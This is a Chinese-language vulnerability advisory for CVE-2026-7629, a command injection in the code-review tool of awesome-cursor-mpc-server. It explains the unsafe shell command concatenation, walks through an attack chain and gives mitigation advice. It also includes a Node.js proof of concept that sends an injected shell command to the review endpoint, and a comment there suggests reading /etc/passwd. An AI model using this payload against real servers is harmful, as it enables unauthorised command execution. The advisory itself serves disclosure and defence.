CVE-2026-7629 CVSS 6.3 中危

CVE-2026-7629 awesome-cursor-mpc-server命令注入漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7629

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

kleneway awesome-cursor-mpc-server

漏洞概述

kleneway awesome-cursor-mpc-server是一款代码审查服务器工具。在其2.0.1及之前的版本中，src/tools/codeReview.ts文件的runCodeReviewTool函数被发现存在安全缺陷。该漏洞源于程序未能正确过滤用户输入，导致攻击者可以通过发送特制的恶意数据包触发命令注入攻击。由于该漏洞允许远程利用且无需用户交互，攻击者成功利用后可在服务器上下文中执行任意系统命令，造成信息泄露、数据篡改或服务中断。目前厂商已收到通知但尚未发布修复补丁。

技术细节

该漏洞的核心原理在于不安全的命令拼接。在受影响版本的src/tools/codeReview.ts文件中，runCodeReviewTool函数负责处理代码审查请求。该函数在构建系统命令时，直接将用户可控的输入参数拼接到命令字符串中，并传递给底层解释器执行（如Node.js的child_process.exec）。由于缺乏有效的输入清洗和参数化处理，攻击者可以注入Shell元字符（如分号;、管道符|、反引号`或$()等）。这些字符会被Shell解析器识别为指令分隔符或命令替换符，从而截断原有命令逻辑并附加执行攻击者指定的任意操作系统指令。攻击者利用此漏洞可绕过应用层限制，直接获得服务器端的命令执行权限。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器正在运行kleneway awesome-cursor-mpc-server 2.0.1或更早版本。

STEP 2

武器化

攻击者构造包含Shell元字符（如;或`）的恶意输入数据，旨在截断原有的代码审查命令并注入操作系统指令。

STEP 3

交付

攻击者通过网络向受影响组件的runCodeReviewTool接口发送包含恶意Payload的HTTP请求。

STEP 4

利用

服务器端接收到请求后，由于未过滤特殊字符，将输入直接拼接到系统命令中并交由Shell执行。

STEP 5

达成目标

注入的恶意命令在服务器上执行，攻击者获得低权限的系统访问能力，可能导致数据泄露或进一步提权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2026-7629 Command Injection
// Target: kleneway awesome-cursor-mpc-server <= 2.0.1

const axios = require('axios');

async function exploitCommandInjection() {
    const targetUrl = 'http://target-host:port/api/review'; // Replace with actual endpoint
    
    // The payload injects a command separator ';' followed by a system command
    // Example: Touching a file to prove execution or reading /etc/passwd
    const maliciousPayload = {
        "fileName": "test.js",
        // Injection payload: ; echo 'CVE-2026-7629' > /tmp/pwn.txt #
        "content": "const x = 1; echo 'CVE-2026-7629' > /tmp/pwn.txt #" 
    };

    try {
        console.log("[+] Sending malicious payload to target...");
        const response = await axios.post(targetUrl, maliciousPayload);
        console.log("[+] Request sent. Check if file /tmp/pwn.txt was created on target.");
        console.log("[+] Response:", response.data);
    } catch (error) {
        console.error("[-] Exploit failed:", error.message);
    }
}

exploitCommandInjection();

影响范围

kleneway awesome-cursor-mpc-server <= 2.0.1

防御指南

临时缓解措施

建议立即在网络边界限制对该应用的非必要访问。由于官方尚未修复，可临时修改src/tools/codeReview.ts源码，禁止直接调用Shell执行命令，改用安全的API库。同时，应检查系统日志中是否存在异常的进程调用记录，以确认是否已被攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表